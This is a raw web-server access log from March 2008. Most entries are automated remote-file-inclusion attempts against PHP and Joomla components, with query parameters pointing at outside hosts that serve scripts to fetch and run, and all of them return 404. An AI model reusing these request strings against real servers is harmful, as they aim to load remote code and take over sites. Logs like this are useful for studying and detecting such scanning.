69.93.43.34 - - [17/Mar/2008:05:00:38 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:00:38 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.26.166 - - [17/Mar/2008:05:00:43 -0700] "GET /logs/?M=A HTTP/1.0" 200 39103 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:02:18 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:02:18 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:02:23 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:02:23 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:04:11 -0700] "GET /logs//include.php?path[docroot]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:04:11 -0700] "GET //include.php?path[docroot]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:04:11 -0700] "GET /logs//include.php?path[docroot]=http://www.caccolas/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:04:12 -0700] "GET /logs//include.php?path[docroot]=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:04:12 -0700] "GET //include.php?path[docroot]=http://www.caccolas/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:04:12 -0700] "GET //include.php?path[docroot]=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.72.208.31 - - [17/Mar/2008:05:04:19 -0700] "GET //community/index.php?from_market=Y&pageurl=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.72.208.31 - - [17/Mar/2008:05:04:19 -0700] "GET /logs//community/index.php?from_market=Y&pageurl=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.52.2.130 - - [17/Mar/2008:05:06:19 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.56.209 - - [17/Mar/2008:05:07:23 -0700] "GET /logs/access_080228.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:08:09 -0700] "GET /logs/access_080215.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:08:09 -0700] "GET /mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:08:09 -0700] "GET /logs/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.87 - - [17/Mar/2008:05:08:10 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.96 - - [17/Mar/2008:05:08:11 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.67.153 - - [17/Mar/2008:05:08:42 -0700] "GET /logs/access_080226.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.153 - - [17/Mar/2008:05:09:05 -0700] "GET /retreat1 HTTP/1.1" 301 93 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:05:09:38 -0700] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:05:09:38 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:05:09:38 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:09:42 -0700] "GET /logs/access.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:05:10:15 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:05:10:16 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:05:10:16 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.192.152.130 - - [17/Mar/2008:05:10:25 -0700] "GET //index.php?classified_path=http://chyna.sufx.net/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.192.152.130 - - [17/Mar/2008:05:10:27 -0700] "GET /logs//index.php?classified_path=http://chyna.sufx.net/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.118.102.153 - - [17/Mar/2008:05:10:30 -0700] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
87.118.102.153 - - [17/Mar/2008:05:10:30 -0700] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
84.14.51.216 - - [17/Mar/2008:05:10:32 -0700] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
84.14.51.216 - - [17/Mar/2008:05:10:33 -0700] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.205.57.211 - - [17/Mar/2008:05:10:43 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.205.57.211 - - [17/Mar/2008:05:10:43 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
84.19.176.131 - - [17/Mar/2008:05:11:13 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:11:16 -0700] "GET /logs/access_080126.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:11:16 -0700] "GET /Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:11:17 -0700] "GET /logs/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.228.60.242 - - [17/Mar/2008:05:12:15 -0700] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.228.60.242 - - [17/Mar/2008:05:12:20 -0700] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.85.114.4 - - [17/Mar/2008:05:12:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.85.114.4 - - [17/Mar/2008:05:12:46 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.85.114.4 - - [17/Mar/2008:05:12:47 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.85.114.4 - - [17/Mar/2008:05:12:48 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:13:04 -0700] "GET /logs/access_080122.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.143 - - [17/Mar/2008:05:13:10 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:13:11 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:13:11 -0700] "GET /convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:13:12 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:13:22 -0700] "GET /logs/access_080124.log//claroline/phpbb/page_tail.php?includePath=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:13:36 -0700] "GET /logs/access_080126.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:13:36 -0700] "GET /Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:13:37 -0700] "GET /logs/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:13:38 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:14:14 -0700] "GET /logs/access_080124.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:14:31 -0700] "GET /logs/access.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:14:56 -0700] "GET /logs/access_080228.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.156.215 - - [17/Mar/2008:05:15:33 -0700] "GET /logs/access_080228.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.215 - - [17/Mar/2008:05:15:33 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.215 - - [17/Mar/2008:05:15:34 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:15:37 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:15:37 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:15:37 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.232.156.215 - - [17/Mar/2008:05:15:37 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:15:37 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:15:42 -0700] "GET /logs/access_080122.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:16:08 -0700] "GET /logs/access_080124.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
84.246.21.243 - - [17/Mar/2008:05:16:39 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.244.247.47 - - [17/Mar/2008:05:16:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.16.166 - - [17/Mar/2008:05:17:03 -0700] "GET /logs/access_080129.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:17:06 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:17:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:17:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:17:16 -0700] "GET /logs/access_080117.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:17:17 -0700] "GET /logs/access_080228.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:17:21 -0700] "GET /logs/access_080122.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:17:21 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:17:21 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [17/Mar/2008:05:17:54 -0700] "GET /logs/access_080124.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/gary.dalnet/dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.70.14.90 - - [17/Mar/2008:05:17:58 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [17/Mar/2008:05:18:15 -0700] "GET /logs/access_080204.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [17/Mar/2008:05:18:15 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:18:36 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:18:36 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:18:42 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:18:42 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
59.124.30.101 - - [17/Mar/2008:05:18:46 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://car-rental-resource.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
59.124.30.101 - - [17/Mar/2008:05:18:47 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
59.124.30.101 - - [17/Mar/2008:05:18:47 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://car-rental-resource.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
59.124.30.101 - - [17/Mar/2008:05:18:48 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.67.21.215 - - [17/Mar/2008:05:19:00 -0700] "GET /modules/xfsection/modify.php?dir_module=http://theplayboyinvest.com/0/s/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:19:20 -0700] "GET /logs/access_080117.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:05:19:28 -0700] "GET /logs/access_080228.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:05:19:28 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:05:19:28 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:19:30 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:19:31 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:19:32 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:19:32 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:19:46 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:19:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:19:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:19:48 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:05:19:49 -0700] "GET /logs/access_080117.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.68 - - [17/Mar/2008:05:19:51 -0700] "GET /modules/xfsection/modify.php?dir_module=http://theplayboyinvest.com/0/s/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
